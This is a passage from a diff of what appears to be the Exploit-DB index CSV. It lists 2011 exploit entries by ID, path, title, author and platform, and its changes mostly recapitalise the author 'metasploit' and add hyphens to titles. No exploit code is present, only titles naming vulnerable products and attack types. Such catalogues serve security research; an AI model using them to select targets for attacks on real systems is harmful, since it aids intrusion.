Buffer Overflow Exploit (Metasploit)",2011-08-19,Qnix,windows,remote,0 17695,platforms/php/webapps/17695.txt,"phpMyRealty <= 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 17694,platforms/php/webapps/17694.txt,"network tracker .95 - Stored XSS",2011-08-19,G13,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache httpd Remote Denial of Service (memory exhaustion)",2011-08-19,kingcope,multiple,dos,0 -17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,metasploit,windows,remote,0 -17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup Authentication Bypass/Command Injection",2011-08-19,metasploit,php,webapps,0 -17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution",2011-08-19,metasploit,windows,remote,0 -17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",2011-08-19,metasploit,windows,remote,0 +17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,Metasploit,windows,remote,0 +17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup Authentication Bypass/Command Injection",2011-08-19,Metasploit,php,webapps,0 +17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 +17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) Stored XSS",2011-08-20,"Eyup CELIK",php,webapps,0 17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin <= 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 @@ -15389,7 +15389,7 @@ id,file,description,date,author,platform,type,port 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX SEH Overwrite (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0 -17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,metasploit,windows,remote,0 +17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,Metasploit,windows,remote,0 17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 - SQL Injection",2011-08-26,evilsocket,php,webapps,0 17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0 17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0 @@ -15428,19 +15428,19 @@ id,file,description,date,author,platform,type,port 17759,platforms/php/webapps/17759.txt,"WordPress Couponer plugin <= 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17760,platforms/php/webapps/17760.txt,"WordPress grapefile plugin <= 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 17761,platforms/php/webapps/17761.txt,"WordPress Plugin image gallery with slideshow <= 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 -17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow",2011-08-31,metasploit,windows,remote,0 +17762,platforms/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow",2011-08-31,Metasploit,windows,remote,0 17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin <= 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17764,platforms/php/webapps/17764.txt,"WordPress Plugin Bannerize <= 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin <= 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 -17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - (.plf) PlayList Buffer Overflow",2011-09-01,metasploit,windows,local,0 +17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - (.plf) PlayList Buffer Overflow",2011-09-01,Metasploit,windows,local,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin <= 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",php,webapps,0 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion",2011-09-03,"HaCkErS eV!L",php,webapps,0 17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0 -17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0 +17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,Metasploit,windows,local,0 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 @@ -15485,13 +15485,13 @@ id,file,description,date,author,platform,type,port 17824,platforms/php/webapps/17824.txt,"Slaed CMS - Code Execution",2011-09-12,brain[pillow],php,webapps,0 17825,platforms/php/webapps/17825.txt,"AstroCMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 21785,platforms/windows/dos/21785.pl,"HCView WriteAV Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 -17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,metasploit,windows,remote,0 +17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,Metasploit,windows,remote,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection",2011-09-13,sherl0ck_,php,webapps,0 17828,platforms/php/webapps/17828.txt,"WordPress Plugin Forum Server <= 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps,0 17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"Microsoft WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 17832,platforms/php/webapps/17832.txt,"WordPress Plugin e-Commerce <= 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 -17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,metasploit,windows,local,0 +17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,Metasploit,windows,local,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT <= 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock <= 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro <= 10.6.2425.1208 - Multiple Vulnerabilites",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -15504,16 +15504,16 @@ id,file,description,date,author,platform,type,port 17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro <= 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17846,platforms/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 - SQL Injection Exploit",2011-09-15,rgod,jsp,webapps,0 17847,platforms/windows/local/17847.py,"Mini-Stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local,0 -17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro <= 4.0.0 - Remote Command Execution",2011-09-16,metasploit,windows,remote,0 -17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer QCP Parsing Heap Overflow",2011-09-17,metasploit,windows,remote,0 +17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro <= 4.0.0 - Remote Command Execution",2011-09-16,Metasploit,windows,remote,0 +17849,platforms/windows/remote/17849.rb,"RealNetworks Realplayer QCP Parsing Heap Overflow",2011-09-17,Metasploit,windows,remote,0 17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Remote Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps,0 17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 - (download.php) Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 -17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 +17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - (edit.php) HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin <= 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 -17855,platforms/windows/remote/17855.rb,"DaqFactory HMI NETB Request Overflow",2011-09-18,metasploit,windows,remote,0 +17855,platforms/windows/remote/17855.rb,"DaqFactory HMI NETB Request Overflow",2011-09-18,Metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)",2011-09-18,loneferret,windows,dos,21 17860,platforms/php/webapps/17860.txt,"WordPress TheCartPress Plugin 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17861,platforms/php/webapps/17861.txt,"WordPress AllWebMenus Plugin 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 @@ -15532,9 +15532,9 @@ id,file,description,date,author,platform,type,port 17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF",2011-09-20,"Sense of Security",hardware,webapps,0 17876,platforms/windows/remote/17876.py,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon DEP Bypass",2011-09-20,blake,windows,local,0 -17878,platforms/windows/dos/17878.txt,"EViews <= 7.0.0.1 (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 +17878,platforms/windows/dos/17878.txt,"EViews <= 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17879,platforms/windows/dos/17879.txt,"MetaServer RT <= 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 -17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro <= 10.6.2425.1208 - File Parsing Buffer Overflow in QUO",2011-09-20,metasploit,windows,local,0 +17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro <= 10.6.2425.1208 - File Parsing Buffer Overflow in QUO",2011-09-20,Metasploit,windows,local,0 17882,platforms/php/webapps/17882.php,"JAKCMS PRO <= 2.2.5 - Remote Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 17884,platforms/windows/remote/17884.py,"Cogent Datahub <= 7.1.1.63 - Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 @@ -15566,7 +15566,7 @@ id,file,description,date,author,platform,type,port 17919,platforms/php/webapps/17919.txt,"Banana Dance CMS and Wiki SQL Injection",2011-10-02,Aodrulez,php,webapps,0 17920,platforms/php/webapps/17920.txt,"Vivvo CMS - Local File include",2011-10-02,JaBrOtxHaCkEr,php,webapps,0 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 -17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",2011-10-02,metasploit,cgi,webapps,0 +17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",2011-10-02,Metasploit,cgi,webapps,0 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console & Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0 17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel Admin Auth Bypass",2011-10-04,Jasman,php,webapps,0 @@ -15579,19 +15579,19 @@ id,file,description,date,author,platform,type,port 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow PoC",2011-10-05,Snake,windows,dos,0 18033,platforms/php/webapps/18033.txt,"Joomla YJ Contact us Component Local File Inclusion",2011-10-25,MeGo,php,webapps,0 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library (show.php) SQL Injection",2011-10-06,M.Jock3R,php,webapps,0 -17936,platforms/windows/remote/17936.rb,"Opera 10/11 (bad nesting with frameset tag) Memory Corruption",2011-10-06,"Jose A. Vazquez",windows,remote,0 +17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption",2011-10-06,"Jose A. Vazquez",windows,remote,0 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0 17938,platforms/php/webapps/17938.txt,"EFront <= 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP+ASLR Bypass",2011-10-07,modpr0be,windows,local,0 17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0 -17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,metasploit,linux,webapps,0 +17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,Metasploit,linux,webapps,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation Exploit",2011-10-08,xi4oyu,linux,local,0 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 17944,platforms/php/webapps/17944.txt,"Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0 -17947,platforms/php/webapps/17947.rb,"Snortreport nmap.php and nbtscan.php Remote Command Execution",2011-10-09,metasploit,php,webapps,0 -17948,platforms/windows/remote/17948.rb,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,metasploit,windows,remote,0 -17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 Backdoor Exploit",2011-10-09,metasploit,php,webapps,0 +17947,platforms/php/webapps/17947.rb,"Snortreport nmap.php and nbtscan.php Remote Command Execution",2011-10-09,Metasploit,php,webapps,0 +17948,platforms/windows/remote/17948.rb,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0 +17949,platforms/php/webapps/17949.rb,"myBB 1.6.4 Backdoor Exploit",2011-10-09,Metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",php,webapps,0 @@ -15604,29 +15604,29 @@ id,file,description,date,author,platform,type,port 17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 XRF/SQL injection",2011-10-10,"Smith Falcon",php,webapps,0 17958,platforms/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 17959,platforms/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0 -17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 (SVG layout) Memory Corruption (0Day)",2011-10-10,"Jose A. Vazquez",windows,remote,0 +17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17961,platforms/php/webapps/17961.txt,"MyBB Advanced Forum Signatures (afsignatures-2.0.4) SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17962,platforms/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,php,webapps,0 17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server <= 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN <= 8.0.0.7 Use After Free",2011-10-10,"Luigi Auriemma",windows,dos,0 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 -17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate PLP File id Parameter Overflow",2011-10-10,metasploit,windows,local,0 -17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow",2011-10-11,metasploit,windows,local,0 +17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate PLP File id Parameter Overflow",2011-10-10,Metasploit,windows,local,0 +17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow",2011-10-11,Metasploit,windows,local,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0 -17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD",2011-10-12,metasploit,windows,remote,0 -17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0 +17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD",2011-10-12,Metasploit,windows,remote,0 +17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow",2011-10-13,Metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 17983,platforms/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus <= 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 -17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow",2011-10-16,metasploit,windows,local,0 +17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow",2011-10-16,Metasploit,windows,local,0 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 -17986,platforms/osx/remote/17986.rb,"Apple Safari file:// Arbitrary Code Execution",2011-10-17,metasploit,osx,remote,0 +17986,platforms/osx/remote/17986.rb,"Apple Safari file:// Arbitrary Code Execution",2011-10-17,Metasploit,osx,remote,0 17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 -17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit libxslt Arbitrary File Creation",2011-10-18,metasploit,windows,remote,0 -17994,platforms/php/webapps/17994.php,"Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 +17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 +17994,platforms/php/webapps/17994.php,"Dolphin <= 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 17992,platforms/php/webapps/17992.txt,"Gnuboard <= 4.33.02 tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17995,platforms/php/webapps/17995.txt,"NoNumber Framework Joomla! Plugin - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 @@ -15648,32 +15648,32 @@ id,file,description,date,author,platform,type,port 18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Stored XSS",2011-10-20,"Stefan Schurtz",multiple,webapps,0 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0 18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 -18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0 +18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,Metasploit,cgi,remote,0 18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile",2011-10-21,rgod,windows,remote,0 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0 18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread PoC",2011-10-22,pigtail23,windows,dos,0 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0 -18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 +18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 - (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - DoS",2011-10-23,Alguien,php,dos,0 18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - DoS (PoC)",2011-10-28,loneferret,windows,dos,0 -18068,platforms/hardware/remote/18068.rb,"LifeSize Room - Command Injection (Metasploit)",2011-11-02,metasploit,hardware,remote,0 +18068,platforms/hardware/remote/18068.rb,"LifeSize Room - Command Injection (Metasploit)",2011-11-02,Metasploit,hardware,remote,0 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change PoC",2011-10-28,vladz,linux,local,0 -18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",2011-10-24,metasploit,windows,local,0 +18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - (CY3 File) Stack Buffer Overflow",2011-10-24,Metasploit,windows,local,0 18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 -18031,platforms/php/webapps/18031.rb,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection",2011-10-25,metasploit,php,webapps,0 -18032,platforms/windows/webapps/18032.rb,"SAP Management Console OSExecute Payload Execution",2011-10-24,metasploit,windows,webapps,0 +18031,platforms/php/webapps/18031.rb,"phpLDAPadmin <= 1.2.1.1 - (query_engine) Remote PHP Code Injection",2011-10-25,Metasploit,php,webapps,0 +18032,platforms/windows/webapps/18032.rb,"SAP Management Console OSExecute Payload Execution",2011-10-24,Metasploit,windows,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop XSS",2011-10-26,M.Jock3R,php,webapps,0 -18036,platforms/php/webapps/18036.txt,"eFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 -18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,metasploit,php,webapps,0 -18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,metasploit,windows,local,0 +18036,platforms/php/webapps/18036.txt,"eFront <= 3.6.10 - (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 +18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 +18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,Metasploit,windows,local,0 18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album <= 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 @@ -15691,7 +15691,7 @@ id,file,description,date,author,platform,type,port 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 